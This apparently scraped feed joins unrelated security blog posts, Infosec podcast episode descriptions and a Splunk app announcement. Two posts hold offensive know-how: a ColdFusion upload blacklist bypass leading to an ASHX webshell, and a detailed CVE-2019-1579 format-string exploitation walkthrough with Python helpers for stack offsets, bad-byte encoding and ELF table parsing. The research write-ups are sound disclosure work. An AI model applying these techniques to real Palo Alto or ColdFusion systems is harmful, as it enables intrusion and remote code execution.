Probably one of the more interesting of my findings was a file extension blacklist bypass for a file upload endpoint. This particular endpoint was on a ColdFusion server and appeared to have no allowedExtensions defined, as I could upload almost any file type. I say almost because a small subset of extensions was blocked with the following error.

Further research found that the ability to upload arbitrary file types had been allowed until recently, when someone reported it as a vulnerability and it was issued CVE-2019-7816. The patch released by Adobe created a blacklist of dangerous file extensions that could no longer be uploaded using cffile upload.

This got me thinking: where there is a blacklist, there is the possibility of a bypass. I googled around for a large file extension list and loaded it into Burp Intruder. After burning through the list, I reviewed the results to find a 500 error on the “.ashx” extension, with a message indicating the content of my file was being executed. A little googling later, I replaced my file with a simple ASHX webshell from the internet and passed it a command. Bingo.
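The hunt itself is mechanical. A minimal stand-in for the Intruder pass, with a toy extension list and a placeholder for the blacklist error text (both assumptions, not the real values):

```python
CANDIDATES = [".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".cfm", ".php"]  # sample list
BLACKLIST_ERROR = "file type is not permitted"  # placeholder error text

def fuzz_upload(upload, stem: str = "probe", extensions=CANDIDATES):
    """Replay the upload once per extension via the caller-supplied
    `upload(filename) -> (status, body)` callable and keep any response
    that is not the stock blacklist rejection (like the 500 on .ashx)."""
    hits = []
    for ext in extensions:
        status, body = upload(stem + ext)
        if BLACKLIST_ERROR not in body:
            hits.append((stem + ext, status))
    return hits
```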

Wrap Up

Overall, the competition proved to be a rewarding experience, both financially and academically. It also helped knowing that each vulnerability found was one less that could be used to attack US federal agencies. My prevailing criticism is that winning unfortunately became more about exploiting the platform, its policies, and its people than about finding vulnerabilities. In CTF, this isn’t particularly unusual for newer contests, which seem to forget (or not care about) the “meta” surrounding the competition itself. Hopefully, in future competitions some of the nuanced issues surrounding vulnerability acceptance and payout can be detached from the competition scoring. My total tally of vulnerabilities against federal targets is displayed below.

Bug Type | Count | CVSS (Competition Metric)
SQL Injection | 12 | 10
Access Control | 8 | 5-9
Remote Code Execution | 6 | 10
Persistent XSS | 5 | 9
Authentication Bypass | 2 | 8-9
Local File Include | 2 | 8
Path Traversal | 1 | 8
XXE | 1 | 5
Rejected/Combined/Duped | 16 | 0

On June 8th it was announced that I had taken 2nd place in the competition and won $15,000 in prize money.

Given the current global pandemic, we decided to donate the prize money to 3 organizations who focus on helping the less fortunate: Water Mission, Low Country Foodbank, and Build Up. For any of you reading this that may have a little extra in these trying times, consider donating to your local charities to support your communities.

A Year of Windows Privilege Escalation Bugs


Early last year I came across an article by Provadys (now Almond) highlighting several bugs they had discovered based on research by James Forshaw of Google’s Project Zero. The research focused on the exploitation of Windows elevation of privilege (EOP) vulnerabilities using NTFS junctions, hard links, and a combination of the two that Forshaw coined “Windows symlinks.” James also released a handy toolset, the symbolic testing toolkit, to ease the exploitation of these vulnerabilities. Since they have already done an excellent job describing these techniques, I won’t rehash their inner workings. The main purpose of this post is to showcase some of our findings and how we exploited them.

Findings

My initial target set was software covered under a bug bounty program. After I had exhausted that group, I moved on to Windows services and scheduled tasks. The table below details the vulnerabilities discovered and additional information regarding the bugs.

Vendor | Arbitrary File | ID | Date Reported | Reference | Reward
(private) | Write | Undisclosed | 04/06/2019 | HackerOne | 500
Ubiquiti | Delete | CVE-2020-8146 | 04/08/2019 | HackerOne | 667
Valve | Write | CVE-2019-17180 | 05/16/2019 | HackerOne | 1250
(private) | Write | Undisclosed | 04/19/2019 | Bugcrowd | 600
Thales | Write | CVE-2019-18232 | 10/15/2019 | ICS-CERT | N/A
Microsoft | Read/Write | CVE-2019-1077 | 05/06/2019 | Microsoft | N/A
Microsoft | Write | CVE-2019-1267 | 05/08/2019 | Microsoft | N/A
Microsoft | Write | CVE-2019-1317 | 09/16/2019 | Microsoft | N/A

PreAuth RCE on Palo Alto GlobalProtect Part II (CVE-2019-1579)

Background

Before I get started, I want to clearly state that I am in no way affiliated with, sponsored by, or endorsed by Palo Alto Networks. All graphics are displayed under fair use for the purposes of this article.

I recently encountered several unpatched Palo Alto firewall devices during a routine red team engagement. These particular devices were internet-facing and configured as GlobalProtect gateways. As a red teamer/bug bounty rookie, I am often asked by customers to prove the exploitability of the vulnerabilities I report. With bug bounty, this is regularly a stipulation for payment, something I don’t think is always necessary or safe in production. If a vulnerability has been proven exploitable by the general security community, a CVE issued, and a patch developed, that should be sufficient for acceptance as a finding. I digress…

The reason an outdated Palo Alto GlobalProtect gateway caught my eye was a recent blog post by DEVCORE team members Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). They identified a pre-authentication format string vulnerability (CVE-2019-1579) that had been silently patched by Palo Alto a little over a year earlier (June 2018). The post also provided instructions for safely checking for the existence of the vulnerability, as well as a generic POC exploit.

Virtual vs Physical Appliance

If you’ve made it this far, you’re probably wondering why there’s a need for another blog post if DEVCORE already covered things. According to the post, “the exploitation is easy,” given you have the right offsets in the PLT and GOT, and assuming the stack is aligned consistently across versions. In reality, however, I found obtaining these offsets and determining the correct instance type and version to be the hard part.

Palo Alto currently markets several next-generation firewall deployments, which can be broadly categorized as physical or virtual. The exploitation details in the article are based on a virtual instance, AWS in this scenario. How then do you determine whether the target device you are investigating is virtual or physical? In my experience, one of the easy ways is the IP address. Companies often do not set up reverse DNS records for their virtual instances, so if the IP/DNS belongs to a major cloud provider, chances are it’s a virtual appliance.
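That check is easy to script. The PTR suffixes below are just common examples and by no means an exhaustive or authoritative list:

```python
import socket

# Illustrative PTR suffixes for major cloud providers (not exhaustive)
CLOUD_SUFFIXES = {
    ".amazonaws.com": "AWS",
    ".cloudapp.azure.com": "Azure",
    ".googleusercontent.com": "GCP",
}

def guess_provider(ptr_name: str) -> str:
    """Map a reverse-DNS name onto a cloud provider, if any."""
    name = ptr_name.lower().rstrip(".")
    for suffix, provider in CLOUD_SUFFIXES.items():
        if name.endswith(suffix):
            return provider
    return "unknown (possibly a physical appliance)"

def classify(ip: str) -> str:
    """Reverse-resolve and classify; a missing PTR is itself a hint."""
    try:
        ptr = socket.gethostbyaddr(ip)[0]
    except OSError:
        return "no PTR record"
    return guess_provider(ptr)
```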

If you determine that the firewall is an AWS instance, head over to the AWS Marketplace and spin up a Palo Alto VM. One of the first things you’ll notice is that you are limited to only the newest releases of 8.0.x, 8.1.x, and 9.0.x.

Don’t worry, you can actually upgrade and downgrade the firmware from the management web interface once it has been launched… if you have a valid support license for the appliance. There are some nuances, however: if you launch 9.0.x, it can only be downgraded to 8.1.x. Another very important detail is to ensure you select an “m4” instance when you downgrade to 8.x.x, or the AWS instance will be unreachable and thus unusable. For physical devices, the supported firmware can be found here

Getting ahold of a valid support license varies in difficulty and price. If you are using the AWS Firewall Bundle, the license is included. If it’s a physical device, it can get complicated and expensive. If you buy the device new from an authorized reseller, you can activate a trial license. If you buy one through something like eBay and it’s a “production” device, make sure the seller transfers the license to you; otherwise you may have to pay a “recertification” fee. If you get really lucky and the device you buy happens to be an RMA-ed device, it will show as a spare when you register it: you get no trial license, you have to pay a fee to get it transferred to production, and then you have to buy a support license.

Once you have the appliance up and running with the version you want to test, you will need to set up a GlobalProtect gateway on one of the interfaces. There are a couple of YouTube videos out there that cover some of the installation steps, but you basically just have to step your way through it until it works. Palo Alto provides some documentation that you can use as a reference if you get stuck. One of the blocking requirements is installing an SSL certificate for the GlobalProtect gateway. The easiest thing here is to generate a self-signed certificate and import it. A simple guide can be found here. Supposedly one can be generated on the device as well.

If you are setting up an AWS instance, you will need to change a key setting on the network interface, or the GlobalProtect gateway will not be accessible. Go to the network interface in AWS that is being used for the GlobalProtect interface, right-click, and select “Change Source/Dest Check”. Change the value to “Disabled” as shown below.

Exploitation

Alright, the vulnerable device firmware is installed and the GlobalProtect gateway is configured, so we’re at the easy part, right??? Well, not exactly… When you SSH into the appliance, you’ll find you are in a custom restricted shell with very limited capabilities.

In order to get those memory offsets for the exploit, we need access to the sslmgr binary. This is going to be kind of hard to pull off in a restricted shell. Previous researchers found at least one way out, but it appears to have been fixed. If only there were another technique that worked; then, theoretically, you could download each firmware version, copy the binary from the device, and retrieve the offsets.

What do we do if we can’t find such a jailbreak… for every version??? Well, it turns out we may be able to use some of the administrative functions of the device, plus the nature of the vulnerability, to help us. One of the features the limited shell provides is the ability to increase the verbosity of the logs generated by key services. It also allows you to tail the log files for each service. Given that the vulnerability is a format string bug, could we leak memory into the log and then read it out? Let’s take a look at the bug(s).

And immediately following is the exact code we were hoping for. It must be our lucky day.

So as long as we populate those four parameters, we can pass format string operators to dump memory from the process into the log. Why is this important? It means we can dump the entire binary from memory and retrieve the offsets we need for the exploit. Before we can do that, we first need to identify the offsets to the buffers on the stack for each of our parameters. I developed a script, which you can grab from GitHub, that locates the specified parameters on the stack and prints out the associated offsets.
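The core idea of that script fits in a few lines. In this sketch, `probe` stands in for the HTTP request against the vulnerable endpoint plus the log tail, and the marker scheme is my own invention:

```python
def find_offsets(probe, params, max_index=128):
    """Find which format-string argument index corresponds to each
    controlled parameter. Each parameter is filled with a unique marker;
    `probe(fmt, markers)` submits one request with `fmt` in the leak
    field and returns the line that shows up in the service log."""
    markers = {name: "MK{}Z".format(i) for i, name in enumerate(params)}
    offsets = {}
    for idx in range(1, max_index + 1):
        leaked = probe("%{}$s".format(idx), markers)
        for name, mark in markers.items():
            if mark in leaked:
                offsets[name] = idx  # this index dereferences our buffer
    return offsets
```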

The script should output something like the screenshot below. Each of these offsets points to a buffer on the stack that we control. We can now select one, populate it with whatever memory address we like, and then use the %s format operator to read the memory at that location.

As is typically the case, there are some problems to work around to get accurate memory dumps. Certain bad characters will cause unintended output: \x00, \x25, and \x26.

Null bytes are a problem because sprintf and strlen treat a null byte as the end of a string. A workaround is to use a format string to point to a null byte at a known index, e.g. %10$c.

The \x25 character breaks our dump because it is the format string character %. We can easily escape it by doubling it: \x25\x25.

The \x26 character is a little trickier. It is an issue because it is the token for splitting HTTP parameters. Since ampersands aren’t prevalent on the stack at known indexes, we just write some to a known index using %n, and then reference that index whenever we encounter an address containing \x26.
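The three rules can be captured in a small encoder. This mirrors the workarounds described, with my own error reporting standing in for the bytes that need the out-of-band tricks:

```python
import struct

# Bytes that can't simply be embedded in the request
SPECIAL = {
    0x00: "null byte: reference one at a known stack index (e.g. %10$c)",
    0x26: "ampersand: write one with %n at a known index and reuse it",
}

def encode_addr(addr: int, fmt: str = "<Q") -> bytes:
    """Pack an address for the format-string payload, doubling \\x25 so
    it survives format processing, and flagging bytes that need the
    null-byte/ampersand workarounds instead of inline encoding."""
    out = bytearray()
    for b in struct.pack(fmt, addr):
        if b in SPECIAL:
            raise ValueError("0x{:02x} -- {}".format(b, SPECIAL[b]))
        if b == 0x25:            # '%' would start a new format specifier
            out += b"%%"
        else:
            out.append(b)
    return bytes(out)
```

The default here is little-endian 64-bit packing; the big-endian MIPS appliance would want `fmt=">Q"` instead.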

Putting this all together, I modified my previous script to write a user-supplied address to the stack, dereference it using the %s format operator, and then output the data at that address to the log. Wrapping this logic in a loop, combined with our handling of special characters, allows us to dump large chunks of memory at any readable location. You can find a MIPS version of this script on our GitHub; executing it should give you output like the screenshot below.

Now that we have the ability to dump arbitrary memory addresses, we can finally dump the strlen GOT and system PLT addresses we need for the exploit. Easy… except, where are they??? Without the sslmgr binary, how do we know what memory address to start dumping to find the binary? We have a chicken-or-egg situation here, and the 64-bit address space is pretty big.

Luckily for us, the restricted shell provides one more break: if a critical service like sslmgr crashes, a stack trace and crash dump can be exported using scp. At this point I’ve gotten pretty good at crashing the service, so we’ll just throw some %n format operators at arbitrary indexes.

I learned something new about IDA Pro during this endeavor: you can use it to open ELF core dumps. Opening the segmentation view in IDA, we could finally see where the binary was loaded in memory. Another interesting detail we noticed while debugging our payloads was that ASLR appeared to be disabled on our MIPS physical device, as the binary and loaded libraries were always loaded at the same addresses.

Finally, let’s start dumping the binary so we can get our offsets. We have roughly 0x40000 bytes to dump, at approximately 4 bytes/second. Ummm, that’s going to take… days. If only there were a shortcut. All we really need are the offsets to strlen and system in the GOT and PLT.

Unfortunately, even if we knew exactly where the GOT and PLT were, nothing in them indicates the function names. How then does GDB or IDA Pro resolve the function names? It uses the ELF headers. We should be able to dump the ELF headers and a fraction of the binary to resolve these locations. After an hour or two, I loaded my memory dump into Binary Ninja (IDA Pro refused to load my malformed ELF). Binary Ninja has proven invaluable for analyzing and manipulating incomplete or corrupted data.

A little research on ELF reveals that the PT_DYNAMIC program header holds a table pointing to other sections with pertinent information about an executable binary. Three of these are important to us: the Symbol Table (DT_SYMTAB, 06), the String Table (DT_STRTAB, 05), and the Global Offset Table (DT_PLTGOT, 03). The Symbol Table lists the proper order of the functions in the PLT and GOT sections. It also provides an offset into the String Table to properly identify each function name.
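Walking that table is straightforward once you have the PT_DYNAMIC bytes in hand. A minimal sketch, assuming 64-bit Elf64_Dyn entries in little-endian order (the MIPS appliance would need the endianness flipped to ">"):

```python
import struct

DT_NULL, DT_PLTGOT, DT_STRTAB, DT_SYMTAB = 0, 3, 5, 6

def parse_dynamic(blob: bytes, endian: str = "<") -> dict:
    """Walk an Elf64_Dyn array (16 bytes per entry: d_tag then d_un)
    and return the addresses of the tables needed to resolve names."""
    wanted = {DT_PLTGOT: "DT_PLTGOT", DT_STRTAB: "DT_STRTAB", DT_SYMTAB: "DT_SYMTAB"}
    tables = {}
    for off in range(0, len(blob) - 15, 16):
        tag, val = struct.unpack_from(endian + "qQ", blob, off)
        if tag == DT_NULL:       # DT_NULL terminates the array
            break
        if tag in wanted:
            tables[wanted[tag]] = val
    return tables
```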

With the offsets to the symbol and string tables, we can properly resolve the function names in the PLT and GOT. I wrote a quick and dirty script to parse through the symbol table dump and output a reordered string table that matches the PLT. This probably could have been done using Binary Ninja’s API, but I’m a n00b. With the symbol table matched to the string table, we can now overlay this with the GOT to get the offsets we need for strlen and system. We have two options for dumping the GOT: use the crash dump from earlier, or manually dump the memory using our script.

I went with the crash dump to save a little time. The listing above shows entries in the GOT that point to the PLT (0x1001xxxx addresses) and several library functions that have already been resolved. Combined with our string table, we can finally pull the correct offsets for strlen and system and finalize our POC. The POC targets the MIPS-based physical Palo Alto appliance, but the scripts should be useful across appliance types with minor tweaking. Wow, all done, easy right?

Important Note

While the sslmgr service has a watchdog monitor to restart the process when it crashes, if it crashes more than ~3 times in a short amount of time, it will not restart and will require a manual restart. Something to keep in mind if you are testing your shiny new exploit against a customer’s production appliance.

How remote work is impacting federal cybersecurity careers | Guest Becky Robertson

Becky Robertson joins us from Booz Allen to discuss creating remote work situations that address modern requirements but don’t sacrifice security. We discuss the ways in which COVID-19 helped the federal sector reconsider every aspect of the workflow process and what that means for future remote roles.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:21 - Cybersecurity origin story
4:58 - Changes from the early days of cybersecurity
6:24 - Staying in the same organization for 25 years
8:56 - Day-to-day work as a VP
10:56 - Security and working from home
13:18 - Technical hurdles to work remotely
15:15 - Changing the nature of work post pandemic 
16:58 - Employees working remotely 
19:04 - Security concerns when working remotely
22:55 - How to pursue a federal cybersecurity career
25:18 - Federal cybersecurity positions in demand
27:42 - Skills needed to work in federal government
29:33 - Federal skills gaps
32:05 - Career advice 
32:57 - Finding mentors 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


Building a billion-dollar cybersecurity company | Guest Sam King

Veracode CEO Sam King is an icon in the realms of secure coding and application security, and she joins the podcast, along with Infosec CEO Jack Koziol, to discuss her cybersecurity journey, the President’s directive on software security and so, so many more topics. You really don’t want to miss this one, folks.

– Download our FREE ebook, Developing cybersecurity talent and teams: https://www.infosecinstitute.com/ebook
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:10 - Origin story
5:05 - Ground floor of cybersecurity 
7:54 - The “aha!” moments 
12:30 - Point where you thought the industry would grow
14:28 - Changes implemented at Veracode
19:52 - Nation’s approach to cybersecurity
24:10 - Federal government security 
26:25 - Government oversight 
28:14 - Secure coding practices 
31:52 - Veracode’s app security report
40:04 - How to learn web application security 
43:46 - Mistakes to avoid when applying  
47:13 - Bringing in more diverse candidates  
51:36 - Maintaining Veracode’s edge
54:25 - Advice to move into a new cybersecurity role
56:24 - Outro 

Sam King is the chief executive officer of Veracode and a recognized expert in cybersecurity, DevSecOps and business management. A founding member of Veracode, Sam has played a significant role in the company’s growth trajectory over the past 15 years, helping to mature it from a small startup to a company with a billion dollar plus valuation. Under her leadership, Veracode has been recognized with several industry distinctions including a seven-time consecutive leader in the Gartner Magic Quadrant, leader in the Forrester SAST Wave and a Gartner Peer Insights Customer Choice for Application Security. Sam has been a keynote speaker at events such as Gartner Security Summit, RSA and the Executive Women’s Forum, on topics ranging from cybersecurity to empowering women and creating diverse and resilient corporate cultures. She has been profiled in business publications such as the Huffington Post, CNNMoney, Financial Times, InfoSecurity Magazine and The Boston Globe.

Sam received her masters of science and engineering in computer and information science from University of Pennsylvania. She earned her BS in computer science from University of Strathclyde in Glasgow, Scotland, where she earned the prestigious Charles Babbage Award, awarded to the student with the highest academic achievement in the graduating class. She currently sits on the board of Progress Software. Sam is also a member of the board of trustees for the Massachusetts Technology Leadership Council, where she was a charter member of the 2030 Challenge: a Tech Compact for Social Justice in efforts to bring more diversity to the local workforce.



How to pick your cybersecurity career path | Guest Alyssa Miller

Alyssa Miller of S&P Global Ratings discusses the easiest pentest she ever ran on an app and the importance of diversity of hiring, not just “diversity of thought.” She also gives some of the best advice we’ve heard yet on picking your cybersecurity path.

– Download our ebook, Developing cybersecurity talent and teams: https://www.infosecinstitute.com/ebook
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
2:44 - Miller’s origin story
5:53 - Experiences working while at school
8:20 - Pursuing a degree
10:57 - How has cybersecurity changed?
12:58 - Coming into cybersecurity from a different perspective
13:55 - Moving to pentesting versus programming
18:52 - Penetration testing through the years
20:46 - A big change in your industry
25:27 - Specifics of a business information security officer 
29:09 - Skills for a business information security officer role
32:34 - “Cyber Defenders’ Career Guide” book
35:08 - What surprised you about writing the book?
41:46 - Equity and inclusion in cybersecurity
47:11 - Who is doing equity correctly? 
49:12 - Long term equity strategies? 
52:45 - Final cybersecurity career advice 
55:40 - Outro 

Alyssa Miller is a hacker, security researcher, advocate and international public speaker with over 15 years of experience in cybersecurity. From a young age, she has enjoyed exploring and deconstructing technology to learn more about how it works. At 12 years old, she bought her first computer. From that $1,000 purchase, she launched a hobby that would later become her career. Just seven years later, she was hired to her first full-time salary job as a programmer. Alyssa is also passionate that doing better in security begins with sharing knowledge and learning from each other. She regularly presents her perspectives through public speaking engagements. She speaks at various industry conferences, vendor and customer hosted events and non-security related events. Alyssa’s mission is to improve all aspects of the security community. Therefore, her topics range from technical to strategic to higher level community and policy issues.

Alyssa is a member of Women in Cyber Security (WiCyS) Racial Equity Committee. Additionally, she participates in other organizations designed to build a more welcoming and cooperative culture in security. As a member of ISACA, Alyssa currently holds a Certified Information Security Manager (CISM) certification. She is also the author of "The Cyber Defenders’ Career Guide," published by Manning in May 2021. We’re going to be discussing all of Alyssa’s fascinating story, her career journey, the work of demystifying cybersecurity and her work helping to create a more inclusive and welcoming space in the cybersecurity industry. 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


How hackathons can help propel your career | Guest Jonathan Tanner

Jonathan Tanner of Barracuda talks about his time moving up the ladder at Barracuda, how he still enjoys computer science competitions like DEFCON Wireless Capture the Flag (CTF), and Barracuda’s revolutionary malware detection ATP platform he built.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
3:04 - Origin story in cybersecurity 
5:45 - Major accomplishments and moving up with Barracuda
7:55 - Daily work as senior security researcher 
10:36 - Was this always what you were interested in?
12:42 - How did you expand your skills and position
14:30 - Cyber security resume tips
17:20 - Becoming a cybersecurity professional
19:01 - How can hackathons and conferences help you?
22:33 - Improving the hiring process
25:33 - How to prepare for cyber security interview
27:46 - Working long term with a tech company
29:27 - What’s next for you at Barracuda?
30:26 - Where should security professionals begin?
33:46 - What’s happening at Barracuda
34:33 - Where can I find out more about you?
35:06 - Outro 


Working as a cybersecurity researcher and industry analyst | Guest French Caldwell

French Caldwell of The Analyst Syndicate talks about his role as founder and chief researcher of the group. We also talk about Caldwell’s time at Gartner research, and his passion for cybersecurity research as a whole.

00:00 - Intro
03:43 - Caldwell’s background in cybersecurity
07:25 - Knowledge management
09:55 - Protecting digital trash
12:33 - Risk assessment and day-to-day work life
18:00 - How has research changed since 1999?
22:48 - Founding The Analyst Syndicate
26:45 - What is your day like at the Syndicate?
28:11 - What is your research like now?
29:33 - Disruptive technology and public policy
31:09 - Disruptive trends
34:30 - Advice to students in disruptive technologies
38:58 - Tell us about your simulator
46:22 - Cyberterrorism and risk to municipalities and hospitals
50:18 - Learn more about Caldwell and the Syndicate
51:54 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

French Caldwell is the leading strategist and thought leader in RegTech, including GRC and ESG, cybersecurity, social and digital risks and regulation, and the impact of disruptive technologies on policy and strategy. He is a former Gartner Fellow and, following Gartner, became the global head of marketing at a Silicon Valley firm that delivers regtech solutions for governance, risk and compliance analytics and reporting. He is skilled at aligning strategy, communications, technology, processes, analysis, policy and people to improve business and mission outcomes, and experienced at advising senior executives and corporate directors on disruptive technology, strategic risk management, cybersecurity and public policy issues.


Healthcare cybersecurity issues and legacy health systems | Guest Dirk Schrader

Dirk Schrader of New Net Technologies talks about healthcare security and legacy systems. We discuss the millions of pieces of health data left out in the open, the issues with closing these holes and the need for professional legacy system-whisperers.

0:00 - Intro
2:56 - What drew Dirk to security
4:46 - Did your Dad’s role inspire you?
5:55 - Stepping stones to your current job
9:35 - What is it like to be a security research manager
14:38 - Unprotected healthcare records
21:50 - Unprotected systems in the U.S.
25:20 - Using better security in hospitals
31:55 - Logistical issues of security for hospitals
37:48 - Best solution for hospital cybersecurity
39:30 - How to prepare for change
42:32 - What skills do you need for this work?
46:00 - Will people pursue these changes?
49:40 - Projects Dirk’s working on
52:10 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Dirk Schrader is the global VP of New Net Technologies (NNT). A native of Germany, Dirk focuses his work on advancing cyber resilience as a sophisticated new approach to tackling the cyberattacks faced by governments and organizations of all sizes, treating change and vulnerability as the two main issues to address in information security.

Dirk has worked on cybersecurity projects around the globe, including more than four years in Dubai. He has published numerous articles in German and English about the need to address change and vulnerability to achieve cyber resilience, drawing on his experience and certifications as CISSP (ISC²) and CISM (ISACA). His recent work includes research in the area of medical devices, where he found hundreds of systems unprotected in the public internet, allowing access to sensitive patient data. This is going to be the topic of today’s episode, and we’re also going to talk about unprotected or poorly protected legacy systems in general, and how we start to build some coverage over this vast swath of unprotected information.


Splunk & advanced filtering with Event Masker

What is Splunk?

Splunk is a Data-to-Everything Platform designed to ingest and analyze all kinds of data, which can then be visualized and correlated through Splunk searches, alerts, dashboards and reports. Splunk was positioned as a Leader in Gartner’s 2020 Magic Quadrant for SIEM for its analytics performance, and as a Visionary in the Application Performance Monitoring category.

Splunk and SCRT Analytics Team

SCRT provides a Splunk-based SIEM solution focused first and foremost on suspicious behavior detection, through a custom library of use cases built on its field experience and know-how in cybersecurity.

SCRT chose Splunk Enterprise and Splunk Enterprise Security, which integrate with the customer’s infrastructure and provide the full power of Splunk to ingest, correlate, analyse and display valuable information for anomaly detection.

Nevertheless, Splunk lacks a viable solution for a proper whitelisting strategy that would enable users to filter out part of their search results. For this purpose, SCRT has developed a custom Splunk app called “Event Masker” that provides filtering functionality through a simple yet powerful whitelist rules editor.

Event Masker

Event Masker provides filtering functionalities in Splunk, thereby permitting you to whitelist the events of your choice. Even though you can use Event Masker on any dashboard or query in the Splunk search bar, it was primarily built to reduce the number of false positives in Splunk Enterprise Security by better controlling its notable events.

Event Masker provides:

  • Rules management through an advanced interface that lets you create, import, export and edit rule properties. Each rule contains a set of conditions that are applied when Event Masker is invoked in a Splunk search command or correlation search.
Rules list interface
Rule’s properties
Rule’s conditions
  • The custom search command “mask”, which lets you invoke Event Masker directly from the Splunk search bar.

  • Dashboards to audit the masked events and check the underlying rules.
  • An audit log that lets you track which events were masked over time.
Event Masker Overview dashboard
Masked events over time
Rule logs
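As a quick illustration, the custom “mask” command is simply appended to a search like any other search command. This is a sketch only: the rule-selection argument shown below is a hypothetical placeholder, so refer to the app’s documentation on SplunkBase for the exact parameter names.

```
index=notable sourcetype=stash
| mask ruleset="my_whitelist_rule"
```

Events matching the conditions of the referenced whitelist rule are filtered out of the result set before it reaches the analyst.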

Release

Event Masker was released under CC BY-NC 4.0 and published on SplunkBase: https://splunkbase.splunk.com/app/5545/

We are pleased to provide this app freely to the Splunker community via a public GitHub repository: https://github.com/scrt/event_masker/. Feel free to co-develop the app with us to improve the Splunk experience and the efficiency of threat detection.

Many thanks to the whole SCRT Analytics team, whose expertise and hard work made this great project possible.

Project management careers in the military and private sector | Guest Ginny Morton

Ginny Morton, project management professional at Dell and veteran in the U.S. Army, takes us through the practice of cybersecurity project management in both for-profit and military sectors on today’s episode. We talk about Scrum and Agile certifications, building the best team for the project and tapping into your personal power in your work. 

0:00 - Intro
2:04 - Origin story
4:47 - What does a cybersecurity project manager do?
6:10 - Average work day as a project manager
7:40 - Best and worst parts of project management
9:30 - How does a PM improve cybersecurity work?
10:40 - Dell team management
12:50 - Being the team’s first manager
14:36 - Best project management certifications
21:02 - PM work for Dell versus the military
23:00 - Military clearances for PM work
24:08 - Skills and experiences necessary for high-level PM
22:52 - Skills and interests for a successful career
27:04 - Tips for those who want to transition careers
27:38 - Changes to PM work during COVID
28:40 - Adjustments to work from home
29:55 - Will PM work change?
31:04 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Ginny Morton is a senior cyber security advisor, program management at Dell, and has spent much of her career in the project management space for cybersecurity, previously working at TekSystems and in both the Texas Army National Guard and the U.S. Army.

Our recent guest, project manager Jackie Olshack, recommended Morton for the show. Since a ton of people tuned in to see Jackie’s episode, we realized that our listeners are passionate about learning more about project management in IT and cyber as a career path, so I’m looking forward to talking with Morton about her career path as well as the unique aspects of doing project management work on a federal/military level.


Data governance strategy in 2021 | Guest Rita Gurevich

This episode we welcome Rita Gurevich, CEO and founder of Sphere Technology Solutions. She talks about what it’s like to start her own company, why it is important to know your assets when setting policy, and what skills and experiences set applicants apart when they look to hire. Plus, she has plenty of data governance strategies to chat about. 

0:00​ - Intro
2:47​ - Origin story
4:51​ - The creation of Sphere
7:14​ - Working solo at Sphere
9:12​ - What would you change going back?
10:30​ - Pricing your business activities
12:36​ - Average day as a CEO
13:32​ - Favorite parts of the job
14:50​ - What is data governance?
17:40​ - Factors driving data growth
19:28​ - First steps to form data strategy
22:07​ - Data governance best practices
23:40​ - Time frame to get a master inventory
25:17​ - What does good data governance do
26:12​ - Skills I need for data governance and management
27:47​ - Importance of collaboration and mentorship
30:26​ - Skills and experiences for Sphere candidates
32:48​ - Tips to get into cybersecurity work
34:06​ - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

As the CEO and Founder of Sphere, Rita Gurevich is charged with leading the strategic growth of the organization in providing business critical governance, security and compliance solutions to customers spanning multiple geographic locations and industry verticals.

Gurevich founded Sphere after gaining a massive amount of experience in a short time period during the Lehman bankruptcy, the economic downturn of 2008, and the enhanced regulatory environment that dominated the industry. Being in a unique position from this experience, Gurevich founded Sphere as a single contributor, and worked strategically to grow the company into the entity it is today.

Gurevich is the recipient of multiple honors and awards, including recognition of her entrepreneurial skills from Ernst & Young and SmartCEO, along with a spot on the 40 Under 40 list in 2017. In addition, Gurevich sits on the board of directors for the New Jersey Technology Council.

This week’s topic is data governance strategies in 2021. As more of what we do goes online and into the cloud, and as more people need access to information, making sure that entrance points aren’t more accessible than they need to be is more important than ever. We’re going to talk about the issues around this topic, and also job strategies for people who want to do this type of work.


Lessons cybersecurity can learn from physical security | Guest Jeff Schmidt

This episode we welcome Jeff Schmidt of Covail to discuss security and risk management, working at the FBI to create the InfraGard program, and what cybersecurity can learn from physical security controls and fire safety and protection.

0:00 - Intro
2:30 - Origin story
4:31 - Stepping stones throughout career
8:00 - Average work day
12:14 - Learning from physical security
17:18 - Deficiencies in detection
22:17 - Which security practices need to change?
24:15 - How massive would this change be?
27:37 - Skills needed for real-time detection
32:00 - Strategies to get into cybersecurity
34:30 - Final words on the industry
37:16 - What is Covail?
38:40 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

